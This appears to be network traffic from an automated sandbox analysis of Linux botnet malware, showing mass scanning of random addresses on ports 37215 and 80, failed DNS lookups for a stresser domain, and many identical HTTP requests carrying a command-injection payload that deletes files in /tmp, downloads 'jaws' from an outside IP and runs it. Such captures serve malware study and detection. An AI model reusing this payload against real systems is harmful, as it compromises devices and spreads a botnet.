                                                    Dec 3, 2024 23:01:56.031316042 CET5953437215192.168.2.23197.190.152.70
                                                    Dec 3, 2024 23:01:56.031339884 CET5953437215192.168.2.23197.67.155.19
                                                    Dec 3, 2024 23:01:56.031362057 CET5953437215192.168.2.23197.181.21.241
                                                    Dec 3, 2024 23:01:56.031377077 CET5953437215192.168.2.2341.174.233.128
                                                    Dec 3, 2024 23:01:56.031389952 CET5953437215192.168.2.23156.107.23.157
                                                    Dec 3, 2024 23:01:56.031414986 CET5953437215192.168.2.23197.127.5.190
                                                    Dec 3, 2024 23:01:56.031429052 CET5953437215192.168.2.23197.174.46.24
                                                    Dec 3, 2024 23:01:56.031451941 CET5953437215192.168.2.2341.230.240.235
                                                    Dec 3, 2024 23:01:56.031465054 CET5953437215192.168.2.23197.250.66.29
                                                    Dec 3, 2024 23:01:56.031481028 CET5953437215192.168.2.2341.45.146.142
                                                    Dec 3, 2024 23:01:56.031493902 CET5953437215192.168.2.23197.251.206.14
                                                    Dec 3, 2024 23:01:56.031512976 CET5953437215192.168.2.2341.248.129.142
                                                    Dec 3, 2024 23:01:56.031544924 CET5953437215192.168.2.2341.241.212.41
                                                    Dec 3, 2024 23:01:56.031552076 CET5953437215192.168.2.23156.110.160.101
                                                    Dec 3, 2024 23:01:56.031580925 CET5953437215192.168.2.23197.125.51.248
                                                    Dec 3, 2024 23:01:56.031589985 CET5953437215192.168.2.23197.71.190.200
                                                    Dec 3, 2024 23:01:56.031619072 CET5953437215192.168.2.23156.240.133.172
                                                    Dec 3, 2024 23:01:56.031630039 CET5953437215192.168.2.23197.68.77.149
                                                    Dec 3, 2024 23:01:56.031645060 CET5953437215192.168.2.23197.91.89.178
                                                    Dec 3, 2024 23:01:56.031671047 CET5953437215192.168.2.23156.141.190.140
                                                    Dec 3, 2024 23:01:56.031693935 CET5953437215192.168.2.23156.35.152.204
                                                    Dec 3, 2024 23:01:56.031718016 CET5953437215192.168.2.23156.155.241.88
                                                    Dec 3, 2024 23:01:56.031742096 CET5953437215192.168.2.23197.26.49.52
                                                    Dec 3, 2024 23:01:56.031754971 CET5953437215192.168.2.23156.58.105.56
                                                    Dec 3, 2024 23:01:56.031770945 CET5953437215192.168.2.23156.142.164.94
                                                    Dec 3, 2024 23:01:56.031795979 CET5953437215192.168.2.23156.213.216.87
                                                    Dec 3, 2024 23:01:56.031821966 CET5953437215192.168.2.2341.182.140.169
                                                    Dec 3, 2024 23:01:56.031833887 CET5953437215192.168.2.2341.146.174.120
                                                    Dec 3, 2024 23:01:56.031857014 CET5953437215192.168.2.23156.136.92.219
                                                    Dec 3, 2024 23:01:56.031877041 CET5953437215192.168.2.2341.249.191.218
                                                    Dec 3, 2024 23:01:56.031887054 CET5953437215192.168.2.2341.232.124.243
                                                    Dec 3, 2024 23:01:56.031899929 CET5953437215192.168.2.2341.151.23.125
                                                    Dec 3, 2024 23:01:56.031922102 CET5953437215192.168.2.23197.48.21.110
                                                    Dec 3, 2024 23:01:56.031946898 CET5953437215192.168.2.23156.243.169.124
                                                    Dec 3, 2024 23:01:56.031966925 CET5953437215192.168.2.2341.206.209.51
                                                    Dec 3, 2024 23:01:56.031990051 CET5953437215192.168.2.2341.153.100.15
                                                    Dec 3, 2024 23:01:56.032012939 CET5953437215192.168.2.23197.234.43.248
                                                    Dec 3, 2024 23:01:56.032027960 CET5953437215192.168.2.23197.207.231.237
                                                    Dec 3, 2024 23:01:56.032053947 CET5953437215192.168.2.2341.195.158.160
                                                    Dec 3, 2024 23:01:56.032080889 CET5953437215192.168.2.23197.161.225.160
                                                    Dec 3, 2024 23:01:56.032095909 CET5953437215192.168.2.23156.127.246.234
                                                    Dec 3, 2024 23:01:56.032109022 CET5953437215192.168.2.23197.103.126.119
                                                    Dec 3, 2024 23:01:56.032120943 CET5953437215192.168.2.23197.48.255.163
                                                    Dec 3, 2024 23:01:56.032136917 CET5953437215192.168.2.23156.178.166.114
                                                    Dec 3, 2024 23:01:56.032150030 CET5953437215192.168.2.2341.156.105.4
                                                    Dec 3, 2024 23:01:56.032172918 CET5953437215192.168.2.2341.251.229.29
                                                    Dec 3, 2024 23:01:56.032188892 CET5953437215192.168.2.2341.142.86.59
                                                    Dec 3, 2024 23:01:56.032203913 CET5953437215192.168.2.23156.13.141.84
                                                    Dec 3, 2024 23:01:56.032216072 CET5953437215192.168.2.2341.115.240.8
                                                    Dec 3, 2024 23:01:56.032241106 CET5953437215192.168.2.23197.108.100.78
                                                    Dec 3, 2024 23:01:56.032253981 CET5953437215192.168.2.23197.82.84.124
                                                    Dec 3, 2024 23:01:56.032269955 CET5953437215192.168.2.23156.33.94.225
                                                    Dec 3, 2024 23:01:56.032283068 CET5953437215192.168.2.2341.45.3.221
                                                    Dec 3, 2024 23:01:56.032306910 CET5953437215192.168.2.23156.47.223.115
                                                    Dec 3, 2024 23:01:56.032334089 CET5953437215192.168.2.23156.165.62.95
                                                    Dec 3, 2024 23:01:56.032342911 CET5953437215192.168.2.2341.227.65.88
                                                    Dec 3, 2024 23:01:56.032368898 CET5953437215192.168.2.23197.124.226.31
                                                    Dec 3, 2024 23:01:56.032394886 CET5953437215192.168.2.23156.223.112.115
                                                    Dec 3, 2024 23:01:56.032407999 CET5953437215192.168.2.2341.28.67.69
                                                    Dec 3, 2024 23:01:56.032418013 CET5953437215192.168.2.23197.251.102.195
                                                    Dec 3, 2024 23:01:56.032445908 CET5953437215192.168.2.2341.161.173.137
                                                    Dec 3, 2024 23:01:56.032459974 CET5953437215192.168.2.23197.14.248.244
                                                    Dec 3, 2024 23:01:56.032473087 CET5953437215192.168.2.23197.120.196.145
                                                    Dec 3, 2024 23:01:56.032483101 CET5953437215192.168.2.23197.32.248.93
                                                    Dec 3, 2024 23:01:56.032512903 CET5953437215192.168.2.2341.178.211.97
                                                    Dec 3, 2024 23:01:56.032526970 CET5953437215192.168.2.2341.98.200.170
                                                    Dec 3, 2024 23:01:56.032553911 CET5953437215192.168.2.23197.49.15.167
                                                    Dec 3, 2024 23:01:56.032567024 CET5953437215192.168.2.23197.241.230.50
                                                    Dec 3, 2024 23:01:56.032588959 CET5953437215192.168.2.23156.86.12.62
                                                    Dec 3, 2024 23:01:56.032603979 CET5953437215192.168.2.23156.228.238.20
                                                    Dec 3, 2024 23:01:56.032619953 CET5953437215192.168.2.2341.227.227.228
                                                    Dec 3, 2024 23:01:56.032632113 CET5953437215192.168.2.2341.189.48.80
                                                    Dec 3, 2024 23:01:56.032655954 CET5953437215192.168.2.2341.202.168.104
                                                    Dec 3, 2024 23:01:56.032672882 CET5953437215192.168.2.2341.239.208.97
                                                    Dec 3, 2024 23:01:56.032695055 CET5953437215192.168.2.23156.229.91.171
                                                    Dec 3, 2024 23:01:56.032718897 CET5953437215192.168.2.23197.198.102.49
                                                    Dec 3, 2024 23:01:56.032737017 CET5953437215192.168.2.23197.233.206.140
                                                    Dec 3, 2024 23:01:56.032764912 CET5953437215192.168.2.2341.170.239.51
                                                    Dec 3, 2024 23:01:56.032789946 CET5953437215192.168.2.23197.148.239.114
                                                    Dec 3, 2024 23:01:56.032814026 CET5953437215192.168.2.23156.103.199.239
                                                    Dec 3, 2024 23:01:56.032826900 CET5953437215192.168.2.23197.214.167.56
                                                    Dec 3, 2024 23:01:56.032850981 CET5953437215192.168.2.23156.114.106.47
                                                    Dec 3, 2024 23:01:56.032875061 CET5953437215192.168.2.23156.124.166.137
                                                    Dec 3, 2024 23:01:56.032900095 CET5953437215192.168.2.23156.28.196.188
                                                    Dec 3, 2024 23:01:56.032922983 CET5953437215192.168.2.23197.71.28.41
                                                    Dec 3, 2024 23:01:56.032951117 CET5953437215192.168.2.23197.2.81.123
                                                    Dec 3, 2024 23:01:56.032963991 CET5953437215192.168.2.23197.165.182.1
                                                    Dec 3, 2024 23:01:56.032989025 CET5953437215192.168.2.2341.32.251.234
                                                    Dec 3, 2024 23:01:56.033013105 CET5953437215192.168.2.23197.5.207.174
                                                    Dec 3, 2024 23:01:56.033035040 CET5953437215192.168.2.23156.113.131.68
                                                    Dec 3, 2024 23:01:56.033061981 CET5953437215192.168.2.23197.212.150.148
                                                    Dec 3, 2024 23:01:56.033083916 CET5953437215192.168.2.2341.3.197.200
                                                    Dec 3, 2024 23:01:56.033109903 CET5953437215192.168.2.2341.4.255.152
                                                    Dec 3, 2024 23:01:56.033133984 CET5953437215192.168.2.23156.120.147.123
                                                    Dec 3, 2024 23:01:56.033159018 CET5953437215192.168.2.23156.64.110.223
                                                    Dec 3, 2024 23:01:56.033185959 CET5953437215192.168.2.2341.104.246.207
                                                    Dec 3, 2024 23:01:56.033195972 CET5953437215192.168.2.23156.136.176.83
                                                    Dec 3, 2024 23:01:56.033210039 CET5953437215192.168.2.23197.198.14.13
                                                    Dec 3, 2024 23:01:56.033222914 CET5953437215192.168.2.23197.210.53.175
                                                    Dec 3, 2024 23:01:56.033248901 CET5953437215192.168.2.23197.101.1.70
                                                    Dec 3, 2024 23:01:56.033265114 CET5953437215192.168.2.2341.148.68.50
                                                    Dec 3, 2024 23:01:56.033277035 CET5953437215192.168.2.2341.1.186.58
                                                    Dec 3, 2024 23:01:56.033289909 CET5953437215192.168.2.23156.86.182.21
                                                    Dec 3, 2024 23:01:56.033298969 CET5953437215192.168.2.2341.69.26.244
                                                    Dec 3, 2024 23:01:56.033324957 CET5953437215192.168.2.23197.235.11.94
                                                    Dec 3, 2024 23:01:56.033346891 CET5953437215192.168.2.23156.167.87.170
                                                    Dec 3, 2024 23:01:56.033353090 CET5953437215192.168.2.23197.210.94.252
                                                    Dec 3, 2024 23:01:56.033365965 CET5953437215192.168.2.23156.140.191.204
                                                    Dec 3, 2024 23:01:56.033381939 CET5953437215192.168.2.23197.216.108.76
                                                    Dec 3, 2024 23:01:56.033396959 CET5953437215192.168.2.23197.176.55.61
                                                    Dec 3, 2024 23:01:56.033427954 CET5953437215192.168.2.23197.68.93.41
                                                    Dec 3, 2024 23:01:56.033438921 CET5953437215192.168.2.2341.195.41.105
                                                    Dec 3, 2024 23:01:56.033462048 CET5953437215192.168.2.2341.129.93.66
                                                    Dec 3, 2024 23:01:56.033485889 CET5953437215192.168.2.2341.37.228.169
                                                    Dec 3, 2024 23:01:56.033499002 CET5953437215192.168.2.23197.201.54.217
                                                    Dec 3, 2024 23:01:56.033524990 CET5953437215192.168.2.23156.164.217.114
                                                    Dec 3, 2024 23:01:56.033549070 CET5953437215192.168.2.2341.142.129.25
                                                    Dec 3, 2024 23:01:56.033562899 CET5953437215192.168.2.2341.156.98.83
                                                    Dec 3, 2024 23:01:56.033576965 CET5953437215192.168.2.23156.160.47.209
                                                    Dec 3, 2024 23:01:56.033601999 CET5953437215192.168.2.23156.50.36.236
                                                    Dec 3, 2024 23:01:56.033624887 CET5953437215192.168.2.2341.101.228.206
                                                    Dec 3, 2024 23:01:56.033649921 CET5953437215192.168.2.23197.15.234.123
                                                    Dec 3, 2024 23:01:56.033660889 CET5953437215192.168.2.23156.252.82.234
                                                    Dec 3, 2024 23:01:56.033689022 CET5953437215192.168.2.2341.145.173.237
                                                    Dec 3, 2024 23:01:56.033701897 CET5953437215192.168.2.2341.11.160.24
                                                    Dec 3, 2024 23:01:56.033729076 CET5275080192.168.2.23140.3.1.82
                                                    Dec 3, 2024 23:01:56.033736944 CET3974280192.168.2.23199.231.117.174
                                                    Dec 3, 2024 23:01:56.033739090 CET3315080192.168.2.23219.81.41.173
                                                    Dec 3, 2024 23:01:56.033739090 CET3453080192.168.2.23144.90.247.152
                                                    Dec 3, 2024 23:01:56.033740044 CET5649680192.168.2.2350.99.218.207
                                                    Dec 3, 2024 23:01:56.033740044 CET5798480192.168.2.23130.210.96.151
                                                    Dec 3, 2024 23:01:56.033742905 CET3611080192.168.2.2370.118.63.56
                                                    Dec 3, 2024 23:01:56.033749104 CET4724080192.168.2.238.165.237.23
                                                    Dec 3, 2024 23:01:56.033750057 CET5429280192.168.2.2342.98.239.40
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 3, 2024 23:01:45.656773090 CET192.168.2.238.8.8.80x6fafStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:46.185163975 CET192.168.2.238.8.8.80x6fafStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:46.530945063 CET192.168.2.238.8.8.80x6fafStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:46.784374952 CET192.168.2.238.8.8.80x6fafStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:47.158238888 CET192.168.2.238.8.8.80x6fafStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:10.769522905 CET192.168.2.238.8.8.80xf303Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:11.023494005 CET192.168.2.238.8.8.80xf303Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:11.416898966 CET192.168.2.238.8.8.80xf303Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:11.672235966 CET192.168.2.238.8.8.80xf303Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:16.676691055 CET192.168.2.238.8.8.80xf303Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:39.989322901 CET192.168.2.238.8.8.80xd0d8Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:40.242690086 CET192.168.2.238.8.8.80xd0d8Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:40.498322010 CET192.168.2.238.8.8.80xd0d8Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:40.752859116 CET192.168.2.238.8.8.80xd0d8Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:41.005896091 CET192.168.2.238.8.8.80xd0d8Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:04.552587986 CET192.168.2.238.8.8.80x567bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:04.807986975 CET192.168.2.238.8.8.80x567bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:05.062302113 CET192.168.2.238.8.8.80x567bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:05.455249071 CET192.168.2.238.8.8.80x567bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:05.709753036 CET192.168.2.238.8.8.80x567bStandard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.200118065 CET192.168.2.238.8.8.80x2974Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.459211111 CET192.168.2.238.8.8.80x2974Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.711750031 CET192.168.2.238.8.8.80x2974Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.964445114 CET192.168.2.238.8.8.80x2974Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:30.443630934 CET192.168.2.238.8.8.80x2974Standard query (0)scamanje.stresserit.proA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 3, 2024 23:01:46.184892893 CET8.8.8.8192.168.2.230x6fafName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:46.530817986 CET8.8.8.8192.168.2.230x6fafName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:46.784249067 CET8.8.8.8192.168.2.230x6fafName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:47.158065081 CET8.8.8.8192.168.2.230x6fafName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:01:47.632376909 CET8.8.8.8192.168.2.230x6fafName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:11.023323059 CET8.8.8.8192.168.2.230xf303Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:11.416804075 CET8.8.8.8192.168.2.230xf303Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:11.672157049 CET8.8.8.8192.168.2.230xf303Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:16.930119038 CET8.8.8.8192.168.2.230xf303Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:40.242600918 CET8.8.8.8192.168.2.230xd0d8Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:40.498209953 CET8.8.8.8192.168.2.230xd0d8Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:40.752604008 CET8.8.8.8192.168.2.230xd0d8Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:41.005695105 CET8.8.8.8192.168.2.230xd0d8Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:02:41.481715918 CET8.8.8.8192.168.2.230xd0d8Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:04.807742119 CET8.8.8.8192.168.2.230x567bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:05.062177896 CET8.8.8.8192.168.2.230x567bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:05.455091000 CET8.8.8.8192.168.2.230x567bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:05.709455967 CET8.8.8.8192.168.2.230x567bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:06.189296007 CET8.8.8.8192.168.2.230x567bName error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.459120989 CET8.8.8.8192.168.2.230x2974Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.711683035 CET8.8.8.8192.168.2.230x2974Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:29.964345932 CET8.8.8.8192.168.2.230x2974Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:30.443542957 CET8.8.8.8192.168.2.230x2974Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Dec 3, 2024 23:03:30.835864067 CET8.8.8.8192.168.2.230x2974Name error (3)scamanje.stresserit.prononenoneA (IP address)IN (0x0001)false
                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    0192.168.2.23571921.57.198.1680
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:49.914310932 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    1192.168.2.2349548144.233.250.21880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:49.914354086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    2192.168.2.2335186135.15.7.16380
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.039544106 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    3192.168.2.2355322151.59.53.20780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.814915895 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    4192.168.2.235701275.244.175.4080
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938703060 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    5192.168.2.234823892.205.42.24980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938734055 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    6192.168.2.233326460.164.109.20380
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938772917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    7192.168.2.234659279.149.81.19780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938791037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    8192.168.2.2341578184.47.95.23880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938815117 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    9192.168.2.2333014124.90.254.680
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938839912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    10192.168.2.2340858184.220.227.7780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938865900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    11192.168.2.2337830165.207.12.11780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938885927 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    12192.168.2.2354432158.67.27.13180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938927889 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    13192.168.2.2344122124.180.100.20880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938952923 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    14192.168.2.2357712212.110.217.7580
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938970089 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    15192.168.2.2356846203.53.63.11580
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.938997984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    16192.168.2.2344190112.16.175.4180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:50.939023018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    17192.168.2.2359542205.244.238.9280
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045202017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    18192.168.2.2343232164.63.62.18080
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045226097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    19192.168.2.235368850.151.21.880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045250893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
